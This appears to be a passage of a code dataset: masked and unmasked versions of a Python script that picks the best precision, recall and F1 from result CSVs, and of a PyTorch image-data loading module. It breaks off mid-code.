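For context, a short sketch of the neighboring standard-library calls; the values returned depend entirely on the local machine and resolver configuration:

import socket

name = socket.gethostname()  # short host name of the local machine
fqdn = socket.getfqdn()      # fully qualified name, when resolvable
print(name, fqdn)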
79 | 22c498d84f40455d89ed32ccf3bf8778cb159579 | <mask token>
| <mask token>
if __name__ == '__main__':
bestPrecision = [0, 0, 0, 0, 0, 0]
bestPrecisionFile = ['', '', '', '', '', '']
bestRecall = [0, 0, 0, 0, 0, 0]
bestRecallFile = ['', '', '', '', '', '']
bestSupport = [0, 0, 0, 0, 0, 0]
bestSupportFile = ['', '', '', '', '', '']
bestF1_Score = [0, 0, 0, 0, 0, 0]
bestF1_ScoreFile = ['', '', '', '', '', '']
bestPrecisionOverall = 0
bestPrecisionOverallFile = ''
bestRecallOverall = 0
bestRecallOverallFile = ''
bestSupportOverall = 0
bestSupportOverallFile = ''
bestF1_ScoreOverall = 0
bestF1_ScoreOverallFile = ''
for file in os.listdir('results'):
df = pd.read_csv('results/' + file)
for i in range(0, 6):
if bestF1_Score[i] < df['f1_score'][i]:
bestF1_Score[i] = df['f1_score'][i]
bestF1_ScoreFile[i] = file
if bestPrecision[i] < df['precision'][i]:
bestPrecision[i] = df['precision'][i]
bestPrecisionFile[i] = file
if bestRecall[i] < df['recall'][i]:
bestRecall[i] = df['recall'][i]
bestRecallFile[i] = file
if bestSupport[i] < df['support'][i]:
bestSupport[i] = df['support'][i]
bestSupportFile[i] = file
currPrecision = 0
currRecall = 0
currSupport = 0
currF1_Score = 0
        for idx, value in enumerate([0.359, 0.256, 0.205, 0.087, 0.073, 0.016]):
currF1_Score += value * df['f1_score'][idx]
currPrecision += value * df['precision'][idx]
currRecall += value * df['recall'][idx]
currSupport += value * df['support'][idx]
if currPrecision > bestPrecisionOverall:
bestPrecisionOverall = currPrecision
bestPrecisionOverallFile = file
print(file)
print(bestPrecisionOverall)
if currRecall > bestRecallOverall:
bestRecallOverall = currRecall
bestRecallOverallFile = file
if currSupport > bestSupportOverall:
bestSupportOverall = currSupport
bestSupportOverallFile = file
if currF1_Score > bestF1_ScoreOverall:
bestF1_ScoreOverall = currF1_Score
bestF1_ScoreOverallFile = file
bestPrecision.insert(0, 'Precision')
bestPrecisionFile.insert(0, 'Precision')
bestRecall.insert(0, 'Recall')
bestRecallFile.insert(0, 'Recall')
bestSupport.insert(0, 'Support')
bestSupportFile.insert(0, 'Support')
bestF1_Score.insert(0, 'F1_SCORE')
bestF1_ScoreFile.insert(0, 'F1_SCORE')
tableSpecific = [['', 'Class0', 'Class1', 'Class2', 'Class3', 'Class4',
'Class5'], bestPrecision, bestPrecisionFile, bestRecall,
bestRecallFile, bestSupport, bestSupportFile, bestF1_Score,
bestF1_ScoreFile]
tableGeneral = [['Precision Best', 'Recall Best', 'Support Best',
'F1_Score Best'], [bestPrecisionOverall, bestRecallOverall,
bestSupportOverall, bestF1_ScoreOverall], [bestPrecisionOverallFile,
bestRecallOverallFile, bestSupportOverallFile, bestF1_ScoreOverallFile]
]
print(tabulate(tableSpecific))
print(tabulate(tableGeneral))
| import os
import pandas as pd
from tabulate import tabulate
if __name__ == '__main__':
bestPrecision = [0, 0, 0, 0, 0, 0]
bestPrecisionFile = ['', '', '', '', '', '']
bestRecall = [0, 0, 0, 0, 0, 0]
bestRecallFile = ['', '', '', '', '', '']
bestSupport = [0, 0, 0, 0, 0, 0]
bestSupportFile = ['', '', '', '', '', '']
bestF1_Score = [0, 0, 0, 0, 0, 0]
bestF1_ScoreFile = ['', '', '', '', '', '']
bestPrecisionOverall = 0
bestPrecisionOverallFile = ''
bestRecallOverall = 0
bestRecallOverallFile = ''
bestSupportOverall = 0
bestSupportOverallFile = ''
bestF1_ScoreOverall = 0
bestF1_ScoreOverallFile = ''
for file in os.listdir('results'):
df = pd.read_csv('results/' + file)
for i in range(0, 6):
if bestF1_Score[i] < df['f1_score'][i]:
bestF1_Score[i] = df['f1_score'][i]
bestF1_ScoreFile[i] = file
if bestPrecision[i] < df['precision'][i]:
bestPrecision[i] = df['precision'][i]
bestPrecisionFile[i] = file
if bestRecall[i] < df['recall'][i]:
bestRecall[i] = df['recall'][i]
bestRecallFile[i] = file
if bestSupport[i] < df['support'][i]:
bestSupport[i] = df['support'][i]
bestSupportFile[i] = file
currPrecision = 0
currRecall = 0
currSupport = 0
currF1_Score = 0
        for idx, value in enumerate([0.359, 0.256, 0.205, 0.087, 0.073, 0.016]):
currF1_Score += value * df['f1_score'][idx]
currPrecision += value * df['precision'][idx]
currRecall += value * df['recall'][idx]
currSupport += value * df['support'][idx]
if currPrecision > bestPrecisionOverall:
bestPrecisionOverall = currPrecision
bestPrecisionOverallFile = file
print(file)
print(bestPrecisionOverall)
if currRecall > bestRecallOverall:
bestRecallOverall = currRecall
bestRecallOverallFile = file
if currSupport > bestSupportOverall:
bestSupportOverall = currSupport
bestSupportOverallFile = file
if currF1_Score > bestF1_ScoreOverall:
bestF1_ScoreOverall = currF1_Score
bestF1_ScoreOverallFile = file
bestPrecision.insert(0, 'Precision')
bestPrecisionFile.insert(0, 'Precision')
bestRecall.insert(0, 'Recall')
bestRecallFile.insert(0, 'Recall')
bestSupport.insert(0, 'Support')
bestSupportFile.insert(0, 'Support')
bestF1_Score.insert(0, 'F1_SCORE')
bestF1_ScoreFile.insert(0, 'F1_SCORE')
tableSpecific = [['', 'Class0', 'Class1', 'Class2', 'Class3', 'Class4',
'Class5'], bestPrecision, bestPrecisionFile, bestRecall,
bestRecallFile, bestSupport, bestSupportFile, bestF1_Score,
bestF1_ScoreFile]
tableGeneral = [['Precision Best', 'Recall Best', 'Support Best',
'F1_Score Best'], [bestPrecisionOverall, bestRecallOverall,
bestSupportOverall, bestF1_ScoreOverall], [bestPrecisionOverallFile,
bestRecallOverallFile, bestSupportOverallFile, bestF1_ScoreOverallFile]
]
print(tabulate(tableSpecific))
print(tabulate(tableGeneral))
| import os
import pandas as pd
from tabulate import tabulate
if __name__ == '__main__':
bestPrecision = [0,0,0,0,0,0]
bestPrecisionFile = ['','','','','','']
bestRecall = [0,0,0,0,0,0]
bestRecallFile = ['','','','','','']
bestSupport = [0,0,0,0,0,0]
bestSupportFile = ['','','','','','']
bestF1_Score = [0,0,0,0,0,0]
bestF1_ScoreFile = ['','','','','','']
bestPrecisionOverall = 0
bestPrecisionOverallFile = ''
bestRecallOverall = 0
bestRecallOverallFile = ''
bestSupportOverall = 0
bestSupportOverallFile = ''
bestF1_ScoreOverall = 0
bestF1_ScoreOverallFile = ''
for file in os.listdir("results"):
# (0.359*a)+(0.256*b)+(0.205*c)+(0.087*d)+(0.073*e)+(0.016*f)
df = pd.read_csv("results/"+file)
for i in range(0,6):
if bestF1_Score[i] < df["f1_score"][i]:
bestF1_Score[i] = df["f1_score"][i]
bestF1_ScoreFile[i]=file
if bestPrecision[i] < df["precision"][i]:
bestPrecision[i] = df["precision"][i]
bestPrecisionFile[i] = file
if bestRecall[i] < df["recall"][i]:
bestRecall[i] = df["recall"][i]
bestRecallFile[i] = file
if bestSupport[i] < df["support"][i]:
bestSupport[i] = df["support"][i]
bestSupportFile[i] = file
currPrecision = 0
currRecall = 0
currSupport = 0
currF1_Score = 0
for idx,value in enumerate([0.359,0.256,0.205,0.087,0.073,0.016]):
currF1_Score += (value * df["f1_score"][idx])
currPrecision += (value * df["precision"][idx])
currRecall += (value * df["recall"][idx])
currSupport += (value * df["support"][idx])
if currPrecision > bestPrecisionOverall:
bestPrecisionOverall=currPrecision
bestPrecisionOverallFile = file
print(file)
print(bestPrecisionOverall)
if currRecall > bestRecallOverall:
bestRecallOverall=currRecall
bestRecallOverallFile = file
if currSupport > bestSupportOverall:
bestSupportOverall=currSupport
bestSupportOverallFile = file
if currF1_Score > bestF1_ScoreOverall:
bestF1_ScoreOverall=currF1_Score
bestF1_ScoreOverallFile = file
bestPrecision.insert(0,"Precision")
bestPrecisionFile.insert(0, "Precision")
bestRecall.insert(0, "Recall")
bestRecallFile.insert(0, "Recall")
bestSupport.insert(0, "Support")
bestSupportFile.insert(0, "Support")
bestF1_Score.insert(0, "F1_SCORE")
bestF1_ScoreFile.insert(0, "F1_SCORE")
tableSpecific = [["","Class0","Class1","Class2","Class3","Class4","Class5"],
bestPrecision,bestPrecisionFile,bestRecall,bestRecallFile,
bestSupport,bestSupportFile,bestF1_Score,bestF1_ScoreFile]
tableGeneral = [ ["Precision Best","Recall Best","Support Best","F1_Score Best"],
[bestPrecisionOverall,bestRecallOverall,bestSupportOverall,bestF1_ScoreOverall],
[bestPrecisionOverallFile,bestRecallOverallFile,bestSupportOverallFile,bestF1_ScoreOverallFile]]
print(tabulate(tableSpecific))
print(tabulate(tableGeneral))
| null | [
0,
1,
2,
3
] |
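The hard-coded weights [0.359, 0.256, 0.205, 0.087, 0.073, 0.016] act as per-class frequencies (they sum to roughly 1), so each "overall" score above is a frequency-weighted average of the six per-class scores. A standalone sketch of that aggregation, with hypothetical per-class F1 values:

weights = [0.359, 0.256, 0.205, 0.087, 0.073, 0.016]  # class weights, sum ~ 0.996
f1_per_class = [0.91, 0.84, 0.78, 0.66, 0.59, 0.41]   # hypothetical scores
weighted_f1 = sum(w * f for w, f in zip(weights, f1_per_class))
print(round(weighted_f1, 4))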
80 | 5b8c95354f8b27eff8226ace52ab9e97f98ae217 | <mask token>
class my_image_csv_dataset(Dataset):
def __init__(self, data_dir, data, transforms_=None, obj=False,
minorities=None, diffs=None, bal_tfms=None):
self.data_dir = data_dir
self.data = data
self.transforms_ = transforms_
self.tfms = None
self.obj = obj
self.minorities = minorities
self.diffs = diffs
self.bal_tfms = bal_tfms
        assert transforms_ is not None, 'Please pass some transforms.'
def __len__(self):
return len(self.data)
def __getitem__(self, index):
img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])
img = Image.open(img_path)
img = img.convert('RGB')
img = torchvision.transforms.functional.to_grayscale(img,
num_output_channels=3)
y = self.data.iloc[index, 1]
if self.minorities and self.bal_tfms:
if y in self.minorities:
if hasattr(self.bal_tfms, 'transforms'):
for tr in self.bal_tfms.transforms:
tr.p = self.diffs[y]
l = [self.bal_tfms]
l.extend(self.transforms_)
self.tfms = transforms.Compose(l)
else:
for t in self.bal_tfms:
t.p = self.diffs[y]
self.transforms_[1:1] = self.bal_tfms
self.tfms = transforms.Compose(self.transforms_)
else:
self.tfms = transforms.Compose(self.transforms_)
else:
self.tfms = transforms.Compose(self.transforms_)
x = self.tfms(img)
if self.obj:
s = x.size()[1]
if isinstance(s, tuple):
s = s[0]
row_scale = s / img.size[0]
col_scale = s / img.size[1]
y = rescale_bbox(y, row_scale, col_scale)
y.squeeze_()
y2 = self.data.iloc[index, 2]
y = y, y2
return x, y
class my_image_folder(DatasetFolder):
def __init__(self, root, transform=None, target_transform=None, loader=
default_loader, minorities=None, diffs=None, bal_tfms=None,
tta_tfms=None):
super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,
transform=transform, target_transform=target_transform)
self.imgs = self.samples
self.minorities = minorities
self.diffs = diffs
self.bal_tfms = bal_tfms
self.tta_tfms = tta_tfms
self.tfms = None
def __getitem__(self, index):
path, target = self.samples[index]
sample = self.loader(path)
if self.transform:
if self.minorities and self.bal_tfms:
if target in self.minorities:
if hasattr(self.bal_tfms, 'transforms'):
for tr in self.bal_tfms.transforms:
tr.p = self.diffs[target]
l = [self.bal_tfms]
l.extend(self.transform)
self.tfms = transforms.Compose(l)
else:
for t in self.bal_tfms:
t.p = self.diffs[target]
self.tfms = transforms.Compose(self.bal_tfms + self
.transform)
else:
self.tfms = transforms.Compose(self.transform)
elif self.tta_tfms:
self.tfms = self.tta_tfms
else:
self.tfms = transforms.Compose(self.transform)
sample = self.tfms(sample)
if self.target_transform:
target = self.target_transform(target)
return sample, target
<mask token>
def rescale_bbox(bb, row_scale, col_scale):
bb = bb.reshape((-1, 4))
for b in bb:
r1, c1, r2, c2 = b
b[0] = int(np.round(r1 * col_scale))
b[1] = int(np.round(c1 * row_scale))
b[2] = int(np.round(r2 * col_scale))
b[3] = int(np.round(c2 * row_scale))
bb = bb.reshape((1, -1))
return bb
<mask token>
class DataProcessor:
def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=
False, tr_name='train', val_name='val', test_name='test', extension
=None, setup_data=True):
print('+------------------------------------+')
print('| Dream AI |')
print('+------------------------------------+')
print()
self.device = torch.device('cuda:0' if torch.cuda.is_available() else
'cpu')
(self.data_path, self.train_csv, self.val_csv, self.reg, self.
tr_name, self.val_name, self.test_name, self.extension) = (
data_path, train_csv, val_csv, reg, tr_name, val_name,
test_name, extension)
self.obj = False
self.multi_label = False
if setup_data:
self.set_up_data()
def set_up_data(self, split_size=0.15):
data_path, train_csv, val_csv, tr_name, val_name, test_name = (self
.data_path, self.train_csv, self.val_csv, self.tr_name, self.
val_name, self.test_name)
if not data_path:
data_path = os.getcwd() + '/'
tr_path = os.path.join(data_path, tr_name)
val_path = os.path.join(data_path, val_name)
test_path = os.path.join(data_path, test_name)
if os.path.exists(os.path.join(data_path, tr_name + '.csv')):
train_csv = tr_name + '.csv'
if not train_csv:
print('no')
train_csv, val_csv, test_csv = self.data_from_paths_to_csv(
data_path, tr_path, val_path, test_path)
train_csv_path = os.path.join(data_path, train_csv)
train_df = pd.read_csv(train_csv_path)
if 'Unnamed: 0' in train_df.columns:
train_df = train_df.drop('Unnamed: 0', 1)
if len(train_df.columns) > 2:
self.obj = True
img_names = [str(x) for x in list(train_df.iloc[:, 0])]
if self.extension:
img_names = add_extension(img_names, self.extension)
if val_csv:
val_csv_path = os.path.join(data_path, val_csv)
val_df = pd.read_csv(val_csv_path)
val_targets = list(map(str, list(val_df.iloc[:, 1])))
if test_csv:
test_csv_path = os.path.join(data_path, test_csv)
test_df = pd.read_csv(test_csv_path)
test_targets = list(map(str, list(test_df.iloc[:, 1])))
targets = list(map(str, list(train_df.iloc[:, 1])))
lengths = [len(t) for t in [s.split() for s in targets]]
self.target_lengths = lengths
split_targets = [t.split() for t in targets]
if self.obj:
print('\nObject Detection\n')
int_targets = [list(map(float, x)) for x in split_targets]
zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)
for i, t in enumerate(zero_targets):
t[len(t) - len(int_targets[i]):] = int_targets[i]
zero_targets[i] = t
train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.
FloatTensor) for z in zero_targets]
obj_targets = list(map(str, list(train_df.iloc[:, 2])))
obj_split_targets = [t.split() for t in obj_targets]
try:
obj_split_targets = [list(map(int, x)) for x in
obj_split_targets]
except:
pass
dai_onehot, onehot_classes = one_hot(obj_split_targets, True)
c_names = list(onehot_classes)
class_idx = [[c_names.index(i) for i in c] for c in
obj_split_targets]
zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)
for i, t in enumerate(zero_idx):
t[len(t) - len(class_idx[i]):] = class_idx[i]
zero_idx[i] = t
train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.
LongTensor) for z in zero_idx]
self.data_dir, self.num_classes, self.class_names = data_path, len(
onehot_classes), onehot_classes
elif self.reg:
print('\nRegression\n')
int_targets = [list(map(int, x)) for x in split_targets]
zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)
for i, t in enumerate(zero_targets):
t[len(t) - len(int_targets[i]):] = int_targets[i]
zero_targets[i] = t
train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.
FloatTensor) for z in zero_targets]
self.data_dir, self.num_classes, self.class_names = data_path, max(
lengths), np.unique(zero_targets, axis=1)
elif lengths[1:] != lengths[:-1]:
self.multi_label = True
print('\nMulti-label Classification\n')
try:
split_targets = [list(map(int, x)) for x in split_targets]
except:
pass
dai_onehot, onehot_classes = one_hot(split_targets, self.
multi_label)
train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.
FloatTensor) for x in dai_onehot]
self.data_dir, self.num_classes, self.class_names = data_path, len(
onehot_classes), onehot_classes
else:
print('\nSingle-label Classification\n')
unique_targets = list(np.unique(targets))
target_ids = [unique_targets.index(x) for x in targets]
train_df.iloc[:, 1] = target_ids
if val_csv:
target_ids = [unique_targets.index(x) for x in val_targets]
val_df.iloc[:, 1] = target_ids
if test_csv:
target_ids = [unique_targets.index(x) for x in test_targets]
test_df.iloc[:, 1] = target_ids
self.data_dir, self.num_classes, self.class_names = data_path, len(
unique_targets), unique_targets
if not val_csv:
train_df, val_df = split_df(train_df, split_size)
if not test_csv:
val_df, test_df = split_df(val_df, split_size)
tr_images = [str(x) for x in list(train_df.iloc[:, 0])]
val_images = [str(x) for x in list(val_df.iloc[:, 0])]
test_images = [str(x) for x in list(test_df.iloc[:, 0])]
if self.extension:
tr_images = add_extension(tr_images, self.extension)
val_images = add_extension(val_images, self.extension)
test_images = add_extension(test_images, self.extension)
train_df.iloc[:, 0] = tr_images
val_df.iloc[:, 0] = val_images
test_df.iloc[:, 0] = test_images
train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)
val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)
test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)
self.minorities, self.class_diffs = None, None
        if not (self.obj or self.multi_label):  # minorities only apply to single-label targets
self.minorities, self.class_diffs = get_minorities(train_df)
self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,
self.test_name: test_df}
data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,
'num_classes': self.num_classes, 'class_names': self.
class_names, 'minorities': self.minorities, 'class_diffs': self
.class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}
self.data_dict = data_dict
return data_dict
def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,
test_path=None):
train_df = csv_from_path(tr_path, tr_path)
train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),
index=False)
ret = self.tr_name + '.csv', None
if val_path is not None:
val_exists = os.path.exists(val_path)
if val_exists:
val_df = csv_from_path(val_path, tr_path)
val_df.to_csv(os.path.join(data_path, self.val_name +
'.csv'), index=False)
ret = self.tr_name + '.csv', self.val_name + '.csv'
if test_path is not None:
test_exists = os.path.exists(test_path)
if test_exists:
test_df = csv_from_path(test_path, tr_path)
test_df.to_csv(os.path.join(data_path, self.test_name +
'.csv'), index=False)
ret = (self.tr_name + '.csv', self.val_name + '.csv', self.
test_name + '.csv')
return ret
def get_data(self, data_dict=None, s=(224, 224), dataset=
my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=
None, tta=False, num_workers=4, stats_percentage=0.6):
self.image_size = s
if not data_dict:
data_dict = self.data_dict
data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (
data_dict['data_dfs'], data_dict['data_dir'], data_dict[
'minorities'], data_dict['class_diffs'], data_dict['obj'],
data_dict['multi_label'])
if obj or multi_label:
balance = False
if tta:
tta_tfms = {self.tr_name: transforms.Compose([transforms.
FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack
([transforms.ToTensor()(crop) for crop in crops])),
transforms.Lambda(lambda crops: torch.stack([transforms.
Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(
crop) for crop in crops]))]), self.val_name: transforms.
Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda
crops: torch.stack([transforms.ToTensor()(crop) for crop in
crops])), transforms.Lambda(lambda crops: torch.stack([
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224,
0.225])(crop) for crop in crops]))]), self.test_name:
transforms.Compose([transforms.FiveCrop(s[0]), transforms.
Lambda(lambda crops: torch.stack([transforms.ToTensor()(
crop) for crop in crops])), transforms.Lambda(lambda crops:
torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [
0.229, 0.224, 0.225])(crop) for crop in crops]))])}
else:
tta_tfms = None
if not bal_tfms:
bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],
self.val_name: None, self.test_name: None}
else:
bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.
test_name: None}
if obj:
resize_transform = transforms.Resize(s)
else:
resize_transform = transforms.Resize(s)
if not tfms:
tfms = [resize_transform, transforms.ToTensor(), transforms.
Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]
else:
tfms_temp = [resize_transform, transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224,
0.225])]
tfms_temp[1:1] = tfms
tfms = tfms_temp
print(tfms)
data_transforms = {self.tr_name: tfms, self.val_name: [transforms.
Resize(s), transforms.ToTensor(), transforms.Normalize([0.485,
0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [
transforms.Resize(s), transforms.ToTensor(), transforms.
Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}
temp_tfms = [resize_transform, transforms.ToTensor()]
temp_dataset = dataset(os.path.join(data_dir, self.tr_name),
data_dfs[self.tr_name], temp_tfms)
self.img_mean, self.img_std = get_img_stats(temp_dataset,
stats_percentage)
data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][
-1].std = self.img_mean, self.img_std
data_transforms[self.val_name][-1].mean, data_transforms[self.val_name
][-1].std = self.img_mean, self.img_std
data_transforms[self.test_name][-1].mean, data_transforms[self.
test_name][-1].std = self.img_mean, self.img_std
if balance:
image_datasets = {x: dataset(os.path.join(data_dir, self.
tr_name), data_dfs[x], data_transforms[x], obj, minorities,
class_diffs, bal_tfms[x]) for x in [self.tr_name, self.
val_name, self.test_name]}
else:
image_datasets = {x: dataset(os.path.join(data_dir, self.
tr_name), data_dfs[x], data_transforms[x], obj) for x in [
self.tr_name, self.val_name, self.test_name]}
dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],
batch_size=bs, shuffle=True, num_workers=num_workers) for x in
[self.tr_name, self.val_name, self.test_name]}
dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,
self.val_name, self.test_name]}
self.image_datasets, self.dataloaders, self.dataset_sizes = (
image_datasets, dataloaders, dataset_sizes)
return image_datasets, dataloaders, dataset_sizes
def imshow(self, inp, title=None):
"""Imshow for Tensor."""
inp = self.denorm_img(inp)
plt.imshow(inp)
if title:
plt.title(title)
plt.pause(0.001)
def denorm_img(self, inp, calculate=False):
inp = inp.numpy().transpose((1, 2, 0))
if calculate:
mean = np.mean(inp)
std = np.std(inp)
else:
mean = self.img_mean.numpy()
std = self.img_std.numpy()
inp = std * inp + mean
inp = np.clip(inp, 0, 1)
return inp
def show_data(self, folder_name='train', size=(64, 64), bs=5):
        self.get_data(s=size, bs=bs)
batch = next(iter(self.dataloaders[folder_name]))
inputs, classes = batch[0], batch[1]
out = torchvision.utils.make_grid(inputs)
if self.reg:
print(classes)
self.imshow(out, title=[x for x in classes])
elif self.multi_label:
self.imshow(out, title=[self.class_names[np.nonzero(x.type(
torch.LongTensor))] for x in classes])
else:
self.imshow(out, title=[self.class_names[x] for x in classes])
| <mask token>
class my_image_csv_dataset(Dataset):
def __init__(self, data_dir, data, transforms_=None, obj=False,
minorities=None, diffs=None, bal_tfms=None):
self.data_dir = data_dir
self.data = data
self.transforms_ = transforms_
self.tfms = None
self.obj = obj
self.minorities = minorities
self.diffs = diffs
self.bal_tfms = bal_tfms
        assert transforms_ is not None, 'Please pass some transforms.'
def __len__(self):
return len(self.data)
def __getitem__(self, index):
img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])
img = Image.open(img_path)
img = img.convert('RGB')
img = torchvision.transforms.functional.to_grayscale(img,
num_output_channels=3)
y = self.data.iloc[index, 1]
if self.minorities and self.bal_tfms:
if y in self.minorities:
if hasattr(self.bal_tfms, 'transforms'):
for tr in self.bal_tfms.transforms:
tr.p = self.diffs[y]
l = [self.bal_tfms]
l.extend(self.transforms_)
self.tfms = transforms.Compose(l)
else:
for t in self.bal_tfms:
t.p = self.diffs[y]
self.transforms_[1:1] = self.bal_tfms
self.tfms = transforms.Compose(self.transforms_)
else:
self.tfms = transforms.Compose(self.transforms_)
else:
self.tfms = transforms.Compose(self.transforms_)
x = self.tfms(img)
if self.obj:
s = x.size()[1]
if isinstance(s, tuple):
s = s[0]
row_scale = s / img.size[0]
col_scale = s / img.size[1]
y = rescale_bbox(y, row_scale, col_scale)
y.squeeze_()
y2 = self.data.iloc[index, 2]
y = y, y2
return x, y
class my_image_folder(DatasetFolder):
def __init__(self, root, transform=None, target_transform=None, loader=
default_loader, minorities=None, diffs=None, bal_tfms=None,
tta_tfms=None):
super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,
transform=transform, target_transform=target_transform)
self.imgs = self.samples
self.minorities = minorities
self.diffs = diffs
self.bal_tfms = bal_tfms
self.tta_tfms = tta_tfms
self.tfms = None
def __getitem__(self, index):
path, target = self.samples[index]
sample = self.loader(path)
if self.transform:
if self.minorities and self.bal_tfms:
if target in self.minorities:
if hasattr(self.bal_tfms, 'transforms'):
for tr in self.bal_tfms.transforms:
tr.p = self.diffs[target]
l = [self.bal_tfms]
l.extend(self.transform)
self.tfms = transforms.Compose(l)
else:
for t in self.bal_tfms:
t.p = self.diffs[target]
self.tfms = transforms.Compose(self.bal_tfms + self
.transform)
else:
self.tfms = transforms.Compose(self.transform)
elif self.tta_tfms:
self.tfms = self.tta_tfms
else:
self.tfms = transforms.Compose(self.transform)
sample = self.tfms(sample)
if self.target_transform:
target = self.target_transform(target)
return sample, target
<mask token>
def get_index(arr, a):
for i in range(len(arr)):
if sum(arr[i] == a) == len(a):
return i
return False
def rescale_bbox(bb, row_scale, col_scale):
bb = bb.reshape((-1, 4))
for b in bb:
r1, c1, r2, c2 = b
b[0] = int(np.round(r1 * col_scale))
b[1] = int(np.round(c1 * row_scale))
b[2] = int(np.round(r2 * col_scale))
b[3] = int(np.round(c2 * row_scale))
bb = bb.reshape((1, -1))
return bb
def get_img_stats(dataset, sz):
size = int(len(dataset) * sz)
i = 0
imgs = []
for img, _ in dataset:
if i > size:
break
imgs.append(img)
i += 1
imgs_ = torch.stack(imgs, dim=3)
imgs_ = imgs_.view(3, -1)
imgs_mean = imgs_.mean(dim=1)
imgs_std = imgs_.std(dim=1)
return imgs_mean, imgs_std
<mask token>
class DataProcessor:
def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=
False, tr_name='train', val_name='val', test_name='test', extension
=None, setup_data=True):
print('+------------------------------------+')
print('| Dream AI |')
print('+------------------------------------+')
print()
self.device = torch.device('cuda:0' if torch.cuda.is_available() else
'cpu')
(self.data_path, self.train_csv, self.val_csv, self.reg, self.
tr_name, self.val_name, self.test_name, self.extension) = (
data_path, train_csv, val_csv, reg, tr_name, val_name,
test_name, extension)
self.obj = False
self.multi_label = False
if setup_data:
self.set_up_data()
def set_up_data(self, split_size=0.15):
data_path, train_csv, val_csv, tr_name, val_name, test_name = (self
.data_path, self.train_csv, self.val_csv, self.tr_name, self.
val_name, self.test_name)
if not data_path:
data_path = os.getcwd() + '/'
tr_path = os.path.join(data_path, tr_name)
val_path = os.path.join(data_path, val_name)
test_path = os.path.join(data_path, test_name)
if os.path.exists(os.path.join(data_path, tr_name + '.csv')):
train_csv = tr_name + '.csv'
if not train_csv:
print('no')
train_csv, val_csv, test_csv = self.data_from_paths_to_csv(
data_path, tr_path, val_path, test_path)
train_csv_path = os.path.join(data_path, train_csv)
train_df = pd.read_csv(train_csv_path)
if 'Unnamed: 0' in train_df.columns:
train_df = train_df.drop('Unnamed: 0', 1)
if len(train_df.columns) > 2:
self.obj = True
img_names = [str(x) for x in list(train_df.iloc[:, 0])]
if self.extension:
img_names = add_extension(img_names, self.extension)
if val_csv:
val_csv_path = os.path.join(data_path, val_csv)
val_df = pd.read_csv(val_csv_path)
val_targets = list(map(str, list(val_df.iloc[:, 1])))
if test_csv:
test_csv_path = os.path.join(data_path, test_csv)
test_df = pd.read_csv(test_csv_path)
test_targets = list(map(str, list(test_df.iloc[:, 1])))
targets = list(map(str, list(train_df.iloc[:, 1])))
lengths = [len(t) for t in [s.split() for s in targets]]
self.target_lengths = lengths
split_targets = [t.split() for t in targets]
if self.obj:
print('\nObject Detection\n')
int_targets = [list(map(float, x)) for x in split_targets]
zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)
for i, t in enumerate(zero_targets):
t[len(t) - len(int_targets[i]):] = int_targets[i]
zero_targets[i] = t
train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.
FloatTensor) for z in zero_targets]
obj_targets = list(map(str, list(train_df.iloc[:, 2])))
obj_split_targets = [t.split() for t in obj_targets]
try:
obj_split_targets = [list(map(int, x)) for x in
obj_split_targets]
except:
pass
dai_onehot, onehot_classes = one_hot(obj_split_targets, True)
c_names = list(onehot_classes)
class_idx = [[c_names.index(i) for i in c] for c in
obj_split_targets]
zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)
for i, t in enumerate(zero_idx):
t[len(t) - len(class_idx[i]):] = class_idx[i]
zero_idx[i] = t
train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.
LongTensor) for z in zero_idx]
self.data_dir, self.num_classes, self.class_names = data_path, len(
onehot_classes), onehot_classes
elif self.reg:
print('\nRegression\n')
int_targets = [list(map(int, x)) for x in split_targets]
zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)
for i, t in enumerate(zero_targets):
t[len(t) - len(int_targets[i]):] = int_targets[i]
zero_targets[i] = t
train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.
FloatTensor) for z in zero_targets]
self.data_dir, self.num_classes, self.class_names = data_path, max(
lengths), np.unique(zero_targets, axis=1)
elif lengths[1:] != lengths[:-1]:
self.multi_label = True
print('\nMulti-label Classification\n')
try:
split_targets = [list(map(int, x)) for x in split_targets]
except:
pass
dai_onehot, onehot_classes = one_hot(split_targets, self.
multi_label)
train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.
FloatTensor) for x in dai_onehot]
self.data_dir, self.num_classes, self.class_names = data_path, len(
